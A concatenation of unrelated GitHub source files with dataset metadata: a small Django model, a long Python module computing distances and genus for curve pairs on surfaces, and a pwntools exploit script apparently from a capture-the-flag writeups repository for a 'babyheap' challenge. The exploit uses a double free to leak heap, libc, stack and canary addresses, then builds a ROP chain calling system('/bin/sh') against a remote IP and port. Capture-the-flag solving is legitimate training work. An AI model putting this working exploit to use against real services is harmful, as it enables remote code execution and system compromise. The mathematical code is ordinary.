| no_license | https://github.com/ChadShoeby/baseballBot | 3adbdd67648d3b62ccfedbe93f16dcef49ed6631 | fbaf4095a3d08355587b7b8b33bff3683be63ebc | refs/heads/master | 2022-12-19T19:10:53.900648 | 2020-10-15T00:04:35 | 2020-10-15T00:04:35 | 261,327,302 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
from django.contrib.auth.models import User
from frontoffice.models import League
class ManagerProfile(models.Model):
user = models.OneToOneField(User, related_name='manager_profile', on_delete=models.CASCADE)
league = models.ForeignKey(League, related_name='manager_profile', on_delete=models.CASCADE,null=True)
| UTF-8 | Python | false | false | 352 | py | 108 | ManagerProfile.py | 83 | 0.792614 | 0.792614 | 0 | 8 | 43 | 106 |
MICC/MICC | 6,914,897,363,974 | 58b6eb7286c905617cb6ecfa756617ad998545c0 | e19ca1786b1e32bc0537984923f6f94c19ba57eb | /micc/curves.py | 87122f4754ce3f486fa48f4c27d8398ac8459493 | [
"MIT"
]
| permissive | https://github.com/MICC/MICC | 136939f72daa94613645fcc814618ef8564f6944 | 6b220b29e11cbe05e797bf4dd663f594979cc78b | refs/heads/master | 2023-07-19T20:41:33.652707 | 2015-01-12T18:59:38 | 2015-01-12T18:59:38 | 20,266,752 | 0 | 1 | MIT | false | 2023-07-06T21:04:09 | 2014-05-28T17:46:51 | 2015-01-12T18:59:38 | 2023-07-06T21:04:09 | 590 | 1 | 2 | 2 | C++ | false | false | # Give curve pairs class structure in preparation for public access
import numpy as np
from itertools import product, izip
from copy import deepcopy
import re
def fix_matrix_signs(M):
'''
:param M: The matrix with incorrect signs.
:type M: numpy.array(dtype=float64) of shape (2,n,4)
:returns: The matrix of shape (2,n,4) with appropriate signs.
Given a matrix corresponding to a curve pair,
fixes the signs so that the matrix can be traversed by function bdycount.
Starts from the simples point, then assigns based on matching values and
ENS: No qualitative results about the curve pair will be changed by this,
since orientation is just a formality.
'''
row, col = [-1, 1]
sgn = 1
#for ii in range(len(M[0,:])):
while 0 in M[1, :, 1:4:2] and row < M.shape[1]-1:
row += 1
sgn = -sgn
# Starting position and sign are arbitrary.
for i in range(M.shape[1]):
g_val = int(M[0, row, col])
new = np.array(np.where(M[0, g_val, :] == row))
#print np.where(new%2==col%2)
ind = int(new[np.where(new % 2 == col % 2)])
sgn = -sgn
M[1, g_val, ind] = sgn
ind += 2
ind = ind % M.shape[2]
sgn = -sgn
M[1, g_val, ind] = sgn
row = g_val
col = ind
M[1, :, 0] = -1
M[1, :, 2] = 1
return M
def concatenate_matrix(M1, M2):
'''
:param M1: First matrix to combine
:type M1: numpy.array(dtype=float64) of shape (2,n,4)
:param M2: Second matrix to combine
:type M2: numpy.array(dtype=float64) of shape (2,m,4)
:returns: final matrix
Note that n does not have to equal m in general.
Combines two curve pairs into one.
REQ: curve pairs are, of course, encoded as matrices.
INV: new matrix signs will be correct
INV: final matrix will correspond to a single curve.
'''
top_M = np.copy(M1)
bot_m = np.copy(M2)
n = M1.shape[1]
m = M2.shape[1]
top_M[0, 0, 0] = n + m - 1
top_M[0, n-1, 2] = n
bot_m[0] += n * np.ones(M2[0].shape)
bot_m[0, m-1, 2] = 0
bot_m[0, 0, 0] = n-1
new_M = np.vstack((top_M[0], bot_m[0])) # Multi-curve
new_M = np.vstack((new_M, np.vstack((top_M[1], bot_m[1])))).reshape((2, n+m, 4))
left = zip(np.where(top_M[0] == n-1)[0], np.where(top_M[0] == n-1)[1])
i0, j0 = 0,0
for pair in left:
i, j = pair
if j % 2 == 1:
i0, j0 = i, j
new_M[0, i0, j0] = n
temp_ind = np.where(new_M[0, n-1, :] == i0)[0]
temp_ind = int(temp_ind[temp_ind % 2 == 1][0])
temp_val = new_M[0, n-1, temp_ind]
switch_val = new_M[0, n, temp_ind]
new_M[0, n-1, temp_ind] = switch_val
new_M[0, n, temp_ind] = temp_val
return_ind = new_M[0, switch_val, :] == n
return_ind[0:3:2] = False
new_M[0, switch_val, return_ind == True] = n-1
return fix_matrix_signs(new_M)
## Path finding methods -- used to find edge paths in the complement of beta-curve.
## Most are helpers for findAllPaths below.
def visited(curr, face, path):
"""
:param curr:
:param face:
:param path:
:return:
"""
my_face = list(face)
my_face.remove(curr)
v = 0
for edge in my_face:
if edge in path:
v = 1
return v
def is_unique(path, all_paths):
'''
:param path:
:type path:
:param AllPaths:
:type AllPaths:
:returns: boolean
'''
return not (path in all_paths)
def shift(path):
'''
Reorders path with a minimum intersection as the base point.
This is useful for determining path uniqueness.
:param path: list of intersections representing the current path
:type path: list
:returns: list with intersections shifted in order such that the lowest intersection is in the first position.
'''
temp = path.index(min(path))
return path[temp:] + path[:temp]
def invert(path):
'''
:param path: some path
:type path: list
:returns: the inverted path
'''
return shift(path[::-1])
def path_finished_single(edge, face, path):
'''
:param edge:
:type edge:
:param face:
:type face:
:param path:
:type path:
:returns:
'''
C = len(path) > 2 and (edge == path[-1])
faceL = list(face)
faceL.remove(edge)
C = C and not set(faceL).isdisjoint(set(path))
#meeting = lambda e1, e2, face: e1 in face and e2 in face
return C
def path_finished_double(edge, face, path):
'''
:param edge:
:type edge:
:param face:
:type face:
:param path:
:type path:
:returns:
'''
C = len(path) > 2 and (edge == path[-1])
faceL = list(face)
faceL.remove(edge)
C = C and not set(faceL).isdisjoint(set(path))
if path.count(edge) != 2 :
C = 0
#meeting = lambda e1, e2, face: e1 in face and e2 in face
return C
def find_new_paths(current_path, my_face, faces, all_paths, path_function):
'''
:param current_path:
:type current_path:
:param my_face:
:type my_face:
:param faces:
:type faces:
:param all_paths:
:typeall_pathss:
:param path_function:
:typepath_functionn:
:returns:
'''
start = current_path[0]
next_edge = None
sub_path = []
faces_without_current_face = list(faces)
faces_without_current_face.remove(my_face)
for face in faces: # Check all faces...
if start in face and face is not my_face:
#if we find the start edge in another face...
for other_face in faces_without_current_face:
#go through its edges...
if start in other_face: # needed?
face_without_start = list(other_face)
face_without_start.remove(start)
for non_starting_edge in face_without_start:
# try all edges in that path
next_edge = non_starting_edge
if (not visited( start, other_face, current_path ) ) and\
(next_edge not in my_face):
sub_path = [next_edge]
sub_path.extend(current_path)
# Recursive call to take all possible directions
find_new_paths(sub_path, other_face, faces, all_paths, path_function)
elif path_function(next_edge, other_face, current_path):
new_found_path = shift(current_path)
inverted_path = invert(current_path)
unique = lambda path: is_unique(path, all_paths)
if unique(new_found_path) and unique(inverted_path):
all_paths.append(new_found_path)
face_without_start.append(start)
faces_without_current_face.append(face)
def remove_duplicates(faces, all_paths):
'''
:param faces:
:type faces:
:param all_paths:
:type all_paths:
:returns:
'''
paths = list(all_paths)
for path in paths:
for f in faces:
counter = 0
for e in f:
if e in path:
counter += 1
if counter == 3:
all_paths.remove(path)
return all_paths
def find_all_paths(faces):
'''
:param faces:
:type faces:
:returns:
'''
all_paths = []
forward = lambda path, face, path_function: find_new_paths(path, face, faces, all_paths, path_function)
for face in faces:
for edge in face:
forward([edge], face, path_finished_single)
#forward([edge], face, pathFinishedDouble)
all_paths = remove_duplicates(faces, all_paths)
return all_paths
## Now that we have the paths, they need to be
## re- indexed so that matrices can be built from them.
def build_matrices(edge_paths, all_paths):
'''
:param edge_paths: list of face boundary orientations
:type edge_paths: list
:param all_paths: list
:type all_paths: list
Take the paths in the skeleton of the complement of the transverse curve
And create matrices.
'''
#print 'edgePaths:',edgePaths
#print 'AllPaths:',AllPaths[0].loops
master_list = []
# Allow paths to be referenced by face
#print edgePaths
for itr in range(len(edge_paths)):
edge_paths[itr] = dict(edge_paths[itr])
#print 'all_paths:',all_paths
#print 'edge_paths:',edge_paths
ordered_paths , mapped_paths = [],[]
# Rescale path 0-len(path) for matrix
for path in all_paths:
ordered_path = list(np.sort(path))
ordered_paths.append(ordered_path)
mapped_paths.append(dict(zip(ordered_path,range(len(path)))))
#print mapped_paths,'\n'
#Create Matrices using details from edge paths.
for Path, mapped_path in zip(all_paths, mapped_paths):
#Value Matrix
path_size = len(Path)
shape = (path_size, 4)
last = Path[len(Path)-1]
M = np.zeros(shape)
M2 = np.zeros(shape)
M[:, 0] = np.array([path_size-1]+range(path_size-1))
M[:, 2] = np.array(range(1,path_size)+[0])
past_edges = dict()
future_edges = dict()
old_vertex = last
itr = 1
for vertex in Path:
flag = False
for path in edge_paths:
keys = set(path.keys())
if vertex in keys and old_vertex in keys:
past_edges[vertex] = path[vertex]
flag = True
if vertex in keys and Path[itr % path_size] in keys:
if flag:
future_edges[vertex] = (path[vertex] + 2) % 4
else:
future_edges[vertex] = path[vertex]
flag = False
old_vertex = vertex
itr += 1
old_vertex = last
itr = 1
for vertex in Path:
curr_vertex = vertex
next_vertex = Path[itr % path_size]
M[mapped_path[vertex], past_edges[vertex]] = mapped_path[old_vertex]
M[mapped_path[vertex], future_edges[vertex]] = mapped_path[next_vertex]
old_vertex = curr_vertex
itr += 1
# Sign matrix: Stand-alone function
M = fix_matrix_signs(np.array([M, M2], dtype=int))
master_list.append(M)
# End while
return master_list
def face_parse(alpha_edges):
'''
:param alpha_edges: set of faces with alpha edges.
:typealpha_edgess:
:returns: (Bridges, Isalnds, lengthCheck) Bridges : 4-sided regions; Islands : n > 4 - gons; lengthCheck : the number of alpha edges included.
Separate set of all faces into bridges (4-sided regions) and
islands (higher-sided regions) for distance calculator.
'''
bridges, islands = [], []
length_check = []
for pair in alpha_edges:
if pair[0] == 4:
bridges.append(pair)
else:
islands.append(pair)
length_check.extend(list(pair[1]))
return bridges, islands, len(length_check)
###### For Distance Extension #######
def connected(P1, P2):
'''
:param P1:
:type P1:
:param P2:
:type P2:
:returns:
'''
S1 = set(P1)
S2 = set(P2)
if S1.isdisjoint(S2) or (S1.issubset(S2) and S1.issuperset(S2)):
return 0
else:
return 1
def share_edge(path1, path2):
'''
:param path1:
:type path1:
:param path2:
:type path2:
:returns:
'''
if not set(path1).isdisjoint(path2):
return 0, -1
else:
intersection_set = set(path1) & set(path2)
numshared = len(intersection_set)
if numshared != 1:
return 0, -1 #Then they share too much!
else:
shared_item = intersection_set.pop()
return 1, path2.index(shared_item)
def find_combined_paths(all_paths, M_library):
'''
:param all_paths:
:typeall_pathss:
:param M_library:
:typeM_libraryy:
:returns:
'''
list_of_connected = []
path_library = dict(zip(range(len(all_paths)), all_paths))
index1 = 0
for path1 in all_paths:
index2 = 0
for path2 in all_paths:
if share_edge(path1, path2)[0]:
list_of_connected.append((M_library[index1],
M_library[index2]))
index2 += 1
index1 += 1
return list_of_connected
def faces_share_two_edges(faces):
'''
:param faces:
:type faces:
:returns:
'''
distance_three_flag = 0
for face in faces:
faces_without_face = list(faces)
faces_without_face.remove(face)
for other in faces_without_face:
if len(set(face) & set(other)) >1: distance_three_flag = 1
return distance_three_flag
def edges(M):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
:returns: (allFaces, edges) allFaces: tuple of faces including size and set of alpha-edges which bound them; edges: same as allFaces, exceincluding orientation of boundary edges.
'''
#print 'called edges'
# The em list is needed to hold the tuples of (faceLength, faceEdges)
all_faces = []
# INV: Number of faces found.
faces = 0
num_rows, num_cols = M.shape[1:3] #num_rows, num_cols
old_vertices = [] ##list of previous paths
bigonFlag = 0
# Bigons are unwanted structures.
Paths = [] # alpha - edge paths.
facesTemp = dict()
for i,j in product(range(num_rows),range(num_cols)):
#Set of edges associated with face
tr = 1
face = set()
if faces == num_rows:
break # upper bound on possible no. faces
# Start position in matrix: returning to this means a face has been
# enclosed
io =i
jo=j
found = 0 #exit condition
# Number of edges for face. Keeps track of vector solution
edges=0
pathTemp = [];
# Begin traversal
while not found:
gval = int(M[0,i,j]);
#current value at index gives next vertex/row
#value check
arr1 = M[0,gval,:] == i%num_rows
arr2 = M[1,gval,:] != M[1,i,j] #sign check
i_next = gval
alpha = (M[0,i,0]+1)%num_rows
i= i_next
new = np.where(arr1 & arr2)[0]
#new = np.intersect1d(arr1[0],arr2[0],assume_unique=True)
#ENS: val and sign correct
ind = np.where(new%2==j%2) #ENS: beta->beta, alpha->alpha
j_next = (int(new[ind])+1)%num_cols #Always move clockwise
j_old = j
j = j_next
if (i,j) in old_vertices:
break
old_vertices.append((i,j))
edges += 1
alpha_new =( M[0,i,0]+1) % num_rows;
shift = (alpha_new - alpha)
if (shift==1 and j%2 == 1) or (shift == 1-num_rows and alpha_new==0 and j%2==1):
face.add(alpha_new)
pathTemp.append((alpha_new,(j)%num_cols))
elif (shift==-1 and j%2==1 ) or (shift == num_rows-1 and alpha ==0 and j%2==1):
face.add(alpha)
pathTemp.append((alpha,(j)%num_cols))
if (i,j)==(io,jo):
facesTemp[edges] = facesTemp.get(edges,0) +1
if edges==2:
bigonFlag = 1
if not bigonFlag:
Paths.append(pathTemp)
faces += 1
found = 1
all_faces.append((edges,face))
#from sys import stderr
#stderr.write('all_faces '+str(all_faces)+'\n')
#stderr.write('Paths '+str(Paths))
return all_faces, Paths
def boundary_count(M):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
:returns: (faces, bigon) faces: number of faces; bigon: 1 iff a bigon is found
'Simply' count the number of faces bounded by two filling curves on a surface.
Curves must be encoded as matrix according to vertices of intersection and
associated orientation.
'''
faces = 0
numrows, numcols = M.shape[1:3] #num_rows, num_cols
oldEdges = [ ] ##list of previous edge paths
bigonFlag =0
for i,j in product(range(numrows),range(numcols)):
# upper bound on possible no. faces is number of vertices
if faces==numrows: break
io =i
jo=j
#First matrix element; will go to vertex M[0,i,j]
found = 0 #Exit condition
pathLength=0 # Keep track of path length
while not found:
gval = int(M[0,i,j]);
#current value at index gives next vertex/row
arr1 = np.where(M[0,gval,:] == i%numrows) #value check
arr2 = np.where(M[1,gval,:] == -M[1,i,j]); #sign should flip +/-
i = gval # Go to next vertex/row
new = np.intersect1d(arr1[0],arr2[0],assume_unique=True)
#ENS: val and sign correct
ind = np.where(new%2==j%2)
#ENS: beta->beta, alpha->alpha
j = (int(new[ind])+1)%numcols
#Always move clockwise - to next edge
if (i,j) in oldEdges: break
oldEdges.append((i,j))
# To save work and not go on old paths.
# Also so we don't count faces twice...
pathLength += 1
# The path length is the number of edges traversed in the current face.
if (i,j)==(io,jo):
if pathLength==2: bigonFlag = 1;
# Two edges to a face --> bigon
faces += 1
found = 1 #INV: found = 1 -> has found a bdy curve
return faces, bigonFlag
def vector_solution(edges):
solution = dict()
for face in edges:
if face[0] not in solution.keys():
solution[face[0]] = 1
else:
solution[face[0]] += 1
return solution
def genus(M, euler=0, boundaries = 0):
'''
:param M: the matrix representing a pair of curves
:type M: numpy.array(dtype=float64) of shape (2,n, 4)
:param euler: 0 if euler characteristic not needed, else 1
:type euler: int
:returns: (g,X): g: genus; X : euler characteristic
Compute the genus of the span of a curve pair, i.e. the minimal genus surface
on which they fill.
'''
V = M.shape[1] # vertices
P, bigon = boundary_count(M) # Polygons in the complement of curve pair
#if bigon is 1: P -= 1 # pull away one bigon
#Euler characteristic (since edges = 2*vertices) is P - V
# originally X = V-E+P
X = P-V+boundaries
# genus = 1 - 0.5*euler_characteristic
Genus = (2-X)/2
returnVal = dict([(0,Genus),(1,(Genus,X))])
# For return purposes only.
if bigon: Genus -= 1 # Bigons steal genus; this gives it back.
return returnVal[euler]
def test_collection(matrix_list, original_genus):
'''
:param matrix_list:
:typematrix_listt: list of numpy.array(dtype=float64)
:param original_genus:
:typeoriginal_genuss:
:returns: list of booleans and a dictionary containing the matrices without bigons.
Test a collection of matrices to see if they fill a given genus.
Note: Matrices with bigons are still counted in the calculation, but are not returned.
'''
genusCollection = []
index = 0
matrixLibrary = dict()
for M in matrix_list:
bigon = boundary_count(M)[1]
Genus = genus(M)
matrixLibrary[index] = M
index += 1
if bigon:
Genus = 0 # If it has a bigon, it should automatically fail
genusCollection.append(Genus)
# Test if all fill and thus distance g.t. 3
test = [Genus == original_genus for Genus in genusCollection]
return test, matrixLibrary
def fourgonTest(F4, Fn):
'''
:param F4:
:type F4:
:param Fn:
:type Fn:
:returns: boolean: True if Fn is a 4-gon, False otherwise
'''
for islandFace in Fn:
for bridgeFace in F4:
if len(islandFace[1] & bridgeFace[1]) >= 2: return True
return False
def Three(M, allPaths, ext=0, originalGenus = False, boundaries = False, edges = False):
'''
:param M:
:type M:
:param allPaths:
:type allPaths:
:param ext:
:type exr:
:returns: 1 if the curve pair is distance three and 0 otherwise.
'''
three, matrixLibrary = 0, dict()
if not originalGenus:
originalGenus = genus(M)
if not boundaries:
F0, bigon = boundary_count(M)
else:
F0, bigon = boundaries
if not edges:
#Calculate face alpha edges and alpha edge paths
Faces, edgePaths = edges(M)
else:
Faces, edgePaths = edges
Bridges, Islands, lengthCheck = face_parse(Faces)
# Bridges are faces bounded by four edges.
# Islands are bounded bt more than four, say six or eight...
bridgeFaces = [list(face[1]) for face in Bridges]
islandFaces = [list(face[1]) for face in Islands]
############# Quick and dirty checks for distance three #############
if F0 == 1 :
three = 1
# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
# If any face is larger than the number of vertices, it will definitely
# Share an edge with itself. Therefore distance three.
faceSizeTest = [face[0] > M.shape[1] for face in Faces]
if True in faceSizeTest:
three = 1
# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
if fourgonTest(Bridges, Islands):
three = 1
if lengthCheck != 2*M.shape[1]:
three = 1
# print '''The complement contains a polygon which shares an edge with
# itself, and so is distance 3. '''
# See function faceParse
# If this is true, then some face is sharing an edge with itself.
# It can't be a four-gon, since that would mean we have a multi-curve.
# So it must be an island, which means that there is a curve
# in the complement which is distance two. Thus the original pair is
# Distance three.
if faces_share_two_edges(islandFaces):
three = 1
# print ''' Found two faces that share multiple edges: A curve that
# intersects the non-reference curve only two times has been
# found. This curve cannot fill and so the pair is distance 3.
# '''
# Means there is a path of length two.
# Since a curve pair with two intersections cannot fill on any genus >1 ,
# The two curves will be distance three.
#Find linking edge paths in "mesh"
faces = list(bridgeFaces)
faces += islandFaces
#Build paths into curves and intersect with alpha
matrixList = build_matrices(edgePaths, allPaths)
genusTest, matrixLibrary = test_collection(matrixList, originalGenus)
if three != 1:
three = 1 if False in genusTest else 0
# Output
returnVals = [three, matrixLibrary]
return returnVals
def ladder_convert(ladder_top, ladder_bottom):
#print ladderTop, ladderBottom
n = len(ladder_top)
newTop = [' ']*n
newBottom = list(newTop)
for j in range(1, n+1):
if j in ladder_top and j in ladder_bottom:
newTop[ladder_top.index(j)] = ladder_bottom.index(j)
newBottom[ladder_bottom.index(j)] = ladder_top.index(j)
elif j in ladder_top:
ladderTopTemp = list(ladder_top)
indices = [ladder_top.index(j)]; ladderTopTemp[indices[0]] = None#ladderTopTemp.remove(j)
indices.append(ladderTopTemp.index(j))
newTop[indices[0]] = indices[1]
newTop[indices[1]] = indices[0]
elif j in ladder_bottom:
ladderBottomTemp = list(ladder_bottom)
indices = [ladder_bottom.index(j)]; ladderBottomTemp[indices[0]] = None #ladderBottomTemp.remove(j)
indices.append(ladderBottomTemp.index(j))
newBottom[indices[0]] = indices[1]
newBottom[indices[1]] = indices[0]
return newTop, newBottom
def ladder_is_multicurve(top, bottom):
n = len(top)
j0 = top[0]
counter = 1
j = bottom[0]
bottom[0] = None
oldIndex = 0
while j != j0:
old_j = j
if j in top:
nextIndex = top.index(j)
j = bottom[nextIndex]
if None in top:
top[top.index(None)] = old_j
elif None in bottom:
bottom[bottom.index(None)] = old_j
bottom[nextIndex] = None
elif j in bottom:
nextIndex = bottom.index(j)
j = top[nextIndex]
if None in top:
top[top.index(None)] = old_j
elif None in bottom:
bottom[bottom.index(None)] = old_j
top[nextIndex] = None
counter += 1
if None in top:
top[top.index(None)] = j
elif None in bottom:
bottom[bottom.index(None)] = j
return 1 if counter != n else 0
def matrix_is_multicurve(beta):
top = beta[0]
bottom = beta[1]
index = 0
j = top[index]
start = 100
counter = 0
while j != start:
counter += 1
start = top[0]
if top[j] == index :
next_index = j
j = bottom[j]
index = next_index
elif bottom[j] == index:
next_index = j
j = top[j]
index = next_index
if top[j] == bottom[j]: return True
#print 'j', j,'next_index: ', index
return False if counter == len(top) else True
def test_permutations(original_ladder):
distance4 = []
distance3 = []
#from curvepair import CurvePair
ladder = deepcopy(original_ladder)
if not original_ladder is None:
for i in range(len(ladder[0])):
if not ladder_is_multicurve(*ladder):
perm = CurvePair(*ladder)
else:
perm = None
if not perm is None :
if perm.distance is 4:
distance4.append(deepcopy(perm))
else:
distance3.append(deepcopy(perm))
else: pass
first_vertex = ladder[0].pop(0)
ladder[0].append(first_vertex)
if len(distance4) == 0:
print ' Found no distance four permutations of the ladder. '
if distance3:
print 'Distance 3 single curves: '
for curve in distance3:
print 'top : ', curve.ladder[0]
print 'bottom: ', curve.ladder[1]
if distance4:
print 'Distance 4+ single curves: '
for curve in distance4:
print 'top : ', curve.ladder[0]
print 'bottom: ', curve.ladder[1]
return distance4
else:
print "You didn't give me a ladder! "
return []
def test_perms(original_ladder):
distance4 = []
distance3 = []
ladder_to_perm = deepcopy(original_ladder)
#from curvepair import CurvePair
if not original_ladder is None:
for i in range(len(ladder_to_perm[0])):
if not ladder_is_multicurve(*ladder_to_perm):
perm = CurvePair(*deepcopy(ladder_to_perm))
else:
perm = None
if not perm is None :
if not perm.distance is 3:
distance4.append(perm)
else:
distance3.append(perm)
else: pass
first_vertex = ladder_to_perm[0].pop(0)
ladder_to_perm[0].append(first_vertex)
return distance3, distance4
#4+2-3-5-1+
#[1,2,3,2,4]
#[5,3,4,1,5]
#1-6+4-2+5-7+3+
#[7,4,7,2,4,2,6]
#[1,3,6,3,5,1,5]
#2+5-7+3+1-6+4-
#[4,1,4,6,1,6,3]
#[5,7,3,7,2,5,2]
def ladder_to_cycle(ladder_top, ladder_bottom):
locations = {arc: {'top': [], 'bottom': []} for arc in set(ladder_top + ladder_bottom)}
for loc, varc in enumerate(ladder_top):
locations[varc]['top'].append(loc)
for loc, varc in enumerate(ladder_bottom):
locations[varc]['bottom'].append(loc)
n = len(ladder_top)
cycle = ''
#arbitrarily orient them positively
orientation = '+'
current = 'top'
start = 1
prev_loc = (ladder_top+ladder_bottom).index(start) % n
for i in range(n):
#get the top and bottom of the current vertex
top = locations[start]['top']
bottom = locations[start]['bottom']
# if there is an endpoint on both the top and bottom,
# then orientation is preserved and the location is simply
# whatever hasn't already been used. We switch side of the
# ladder accordingly
if top and bottom:
# switch side of ladder
current = 'top' if current == 'bottom' else 'bottom'
# preserve orientation
orientation = '-' if orientation == '-' else '+'
# get the locations avaiable there
locs = locations[start][current]
cycle += str(locs[0]+1) + orientation
if current == 'bottom':
start = ladder_top[locs[0]]
if current == 'top':
start = ladder_bottom[locs[0]]
prev_loc = locs[0]
current = 'top' if current == 'bottom' else 'bottom'
elif not top:
current = 'bottom'
orientation = '-' if orientation == '+' else '+'
locs = locations[start][current]
t = set(locs)
t.remove(prev_loc)
current_loc = t.pop()
cycle += str(current_loc+1)+orientation
start = ladder_top[current_loc]
prev_loc = current_loc
current = 'top'
elif not bottom:
current = 'top'
orientation = '-' if orientation == '+' else '+'
locs = locations[start][current]
t = set(locs)
t.remove(prev_loc)
current_loc = t.pop()
cycle += str(current_loc+1)+orientation
start = ladder_bottom[current_loc]
prev_loc = current_loc
current = 'bottom'
return cycle
def cycle_to_ladder(cycle_rep):
arcs = [int(i) for i in re.split('[-+]', cycle_rep)[:-1]]
n = len(arcs)
signs = re.split('[0-9]+', cycle_rep)[1:]
top = [0 for i in range(len(arcs))]
bottom = [0 for i in range(len(arcs))]
ladder = [top, bottom]
ladder_index = 0
for i in range(1, len(arcs)+1):
current_sign = signs.pop(0)
current_v = arcs.pop(0)
if current_sign == '+':
ladder[0][current_v-1] = i
if i == 1:
ladder[1][current_v-1] = n#((i - 2) % n)
else:
ladder[1][current_v-1] = ((i - 1) % n)
if current_sign == '-':
ladder[1][current_v-1] = i
if i == 1:
ladder[0][current_v-1] = n#((i - 2) % n)
else:
ladder[0][current_v-1] = ((i - 1) % n)
return ladder
#import numpy as np
#from curves import fix_matrix_signs, boundary_count, genus, ladder_convert, vector_solution, edges, Three
from graph import Graph
class CurvePair:
'''
ladder = None
beta = None
top = []
bottom = []
n = 0
matrix = None
boundaries = None
genus = None
edges = None
solution = None
distance = 0
loops = []
'''
def __init__(self, top_beta, bottom_beta, dist=1, conjectured_dist=3,recursive=False):
is_ladder = lambda top, bottom: not (0 in top or 0 in bottom)
if is_ladder(top_beta, bottom_beta):
self.ladder = [top_beta, bottom_beta]
else:
self.ladder = None
if is_ladder(top_beta, bottom_beta):
self.beta = ladder_convert(top_beta, bottom_beta)
self.top = self.beta[0]
self.bottom = self.beta[1]
else:
self.top = top_beta
self.bottom = bottom_beta
self.beta = [self.top, self.bottom]
self.n = len(self.top)
self.matrix = np.zeros((2,self.n,4))
self.matrix[0,:,0] = [self.n-1] + range(self.n-1)
self.matrix[0,:,1] = self.top
self.matrix[0,:,2] = range(1,self.n) +[0]
self.matrix[0,:,3] = self.bottom
self.matrix = fix_matrix_signs(self.matrix)
self.boundaries = boundary_count(self.matrix)
self.genus = genus(self.matrix)
self.edges = edges(self.matrix)
#self.arc_boundary = self.edges[1]
self.solution = vector_solution(self.edges[0])
self.loops = []
self.dist = dist
self.conjectured_dist = conjectured_dist
self.computed_distance = False
self.recursive = recursive
@property
def distance(self):
if self.computed_distance == False:
if self.dist is 1:
graph = Graph(self.edges, rep_num=self.conjectured_dist-2)
graph.compute_loops(self.n, self.genus)
self.loops = graph.gammas
#stderr.write(str(self.loops)+'\n')
self.computed_distance, self.loop_matrices = self.compute_distance(self.matrix, self.loops, recursive=self.recursive)
else:
self.computed_distance = None
return self.computed_distance
else:
return self.computed_distance
def __repr__(self):
return str(self.ladder[0])+'\n'+str(self.ladder[1])+'\n'
def compute_distance(self, M, all_paths,recursive=True):
'''
:param M: the matrix
:type M:
:param all_paths:
:type all_paths:
:returns: dist: the distance if three/four, or 'Higher' if dist is > 4.
Computes the distance between the two curves embedded in the matrix.
If this distance is three, tries to use simple paths to extend the distance
in a different direction. If this fails, simply returns three;
else it prints a curve that is distance four from alpha.
'''
dist_is_three, lib = Three(M, all_paths, originalGenus=self.genus, boundaries=self.boundaries, edges=self.edges)
dist = 3 if dist_is_three else 'at least 4!'
if dist == 3:
return dist, lib
else:
if recursive:
geodesic_distances = []
for k, matrix in lib.iteritems():
#stderr.write(str(matrix))
if np.array_equal(matrix, self.matrix):
continue
elif self.solution == CurvePair(matrix[0, :, 1], matrix[0, :, 3],0).solution \
and len(self.matrix[0]) == len(matrix[0]):
continue
cc = CurvePair(matrix[0, :, 1], matrix[0, :, 3])
#stderr.write(str(k)+": "+str(cc.distance)+'\n')
geodesic_distances.append(cc.distance)
#print 'computed curve',k,'!'
#print '\n'
return min(set(geodesic_distances)) + 1, lib
else:
return dist, lib
| UTF-8 | Python | false | false | 35,397 | py | 27 | curves.py | 18 | 0.554962 | 0.538887 | 0 | 1,176 | 29.098639 | 182 |
hnoson/writeups | 2,070,174,259,004 | 46c8ed83b3f90d48bd85c7c5e2067c445e6e7f21 | 0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b | /contrailctf/2019/babyheap/exploit.py | f190231f314a8665a0aba24bb9c33edeb99474a0 | []
| no_license | https://github.com/hnoson/writeups | 359a33b03286bab19359ad9b089e6f3bfe4fb708 | 05550e3c462108f6c5ba0b69f65694e2eb1dc9b3 | refs/heads/master | 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
from pwn import *
def write(size, data):
s.sendlineafter('>', '1')
s.sendlineafter('size :', str(size))
s.sendlineafter('data :', data)
def read(index):
s.sendlineafter('>', '2')
s.sendlineafter('index :', str(index))
return s.recvuntil('1. ')[:-3]
def free(index):
s.sendlineafter('>', '3')
s.sendlineafter('index :', str(index))
if len(sys.argv) == 1:
s = process('./babyheap', env = {'LD_PRELOAD': './libc.so.6'})
else:
s = remote('114.177.250.4', 2223)
elf = ELF('./babyheap')
libc = ELF('./libc.so.6')
write(0x18, 'A')
free(0)
free(0)
heap_base = u64(read(0).ljust(8, '\0')) - 0x2280
log.info('heap base: %#x' % heap_base)
libc_base = u64(read((0x400560 - (heap_base + 0x260)) // 8).ljust(8, '\0')) - libc.symbols['free']
libc.address = libc_base
log.info('libc base: %#x' % libc_base)
write(0x18, p64(libc.symbols['environ']))
stack_addr = u64(read((0x2280 - 0x260) // 8)[:6].ljust(8, '\0'))
log.info('stack address: %#x' % stack_addr)
write(0x28, p64(stack_addr - 0x11f))
canary = u64('\0' + read((0x22a0 - 0x260) // 8)[:7])
log.info('canary: %#x' % canary)
pop_rdi = libc_base + 0x2155f
ret = 0x400666
payload = ''
payload += 'A' * 0x108
payload += p64(canary)
payload += 'A' * 0x18
payload += p64(pop_rdi) + p64(libc.search('/bin/sh\0').next())
payload += p64(ret)
payload += p64(libc.symbols['system'])
write(0x28, payload)
s.interactive()
| UTF-8 | Python | false | false | 1,420 | py | 219 | exploit.py | 200 | 0.607746 | 0.51831 | 0 | 52 | 26.307692 | 98 |
benjcleveland/python | 8,959,301,818,881 | 1ec1e3fed8dc7a1b0697cea11a6429afb661f029 | 65247ead0579a21f980911f19fb66c5ddda77954 | /assignment1/libsocket.py | d818ed47ec8a4a5aac21522dcf9bc473a284eb53 | []
| no_license | https://github.com/benjcleveland/python | e8169e696768b835800a09e529a1af69da0755c2 | 992f62d451f0ee8537dcdce6fa7155cfba46b639 | refs/heads/master | 2021-01-18T19:22:21.555804 | 2011-03-15T02:04:23 | 2011-03-15T02:04:23 | 1,244,221 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
'''
